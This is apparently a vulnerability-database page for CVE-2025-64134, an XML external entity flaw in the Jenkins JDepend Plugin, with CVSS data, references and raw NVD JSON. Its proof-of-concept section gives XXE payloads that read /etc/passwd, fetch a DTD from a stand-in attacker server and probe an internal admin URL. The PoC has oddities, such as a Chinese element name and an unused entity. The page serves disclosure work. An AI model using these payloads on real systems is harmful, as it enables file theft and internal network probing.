Security Vulnerability Report
CVE-2025-64134 CVSS 7.1 HIGH

CVE-2025-64134

Published: 2025-10-29 14:15:58
Last Modified: 2025-11-05 17:35:42

Description

Jenkins JDepend Plugin 1.3.1 and earlier includes an outdated version of JDepend Maven Plugin that does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:jdepend:*:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins JDepend Plugin <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
XML
<?xml version="1.0" encoding="UTF-8"?>
<!-- PoC for CVE-2025-64134: Jenkins JDepend Plugin XXE -->
<!-- This PoC demonstrates how an attacker can exploit the XXE vulnerability -->
<!-- Usage: Place this XML file in a project directory that Jenkins will analyze -->
<!DOCTYPE jdepend [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
  <!ENTITY xxe2 SYSTEM "http://attacker-controlled-server/xxe.dtd">
]>
<jdepend>
  <packages>
    <package name="com.example.vulnerable">
      <度量>&xxe;</度量>
    </package>
  </packages>
</jdepend>

XML
<?xml version="1.0" encoding="UTF-8"?>
<!-- For SSRF attack (second, separate XML document) -->
<!DOCTYPE data [
  <!ENTITY file SYSTEM "http://internal-network-server:8080/admin">
]>
<data>&file;</data>

References

https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-2936 (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/29/2 (Mailing List, Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64134",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T14:15:57.613",
    "lastModified": "2025-11-05T17:35:42.353",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Jenkins JDepend Plugin 1.3.1 and earlier includes an outdated version of JDepend Maven Plugin that does not configure its XML parser to prevent XML external entity (XXE) attacks."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-611"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:jenkins:jdepend:*:*:*:*:*:jenkins:*:*",
                "versionEndIncluding": "1.3.1",
                "matchCriteriaId": "278758E7-6D4A-408B-B6C1-89097186AFAC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-2936", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}
    ]
  }
}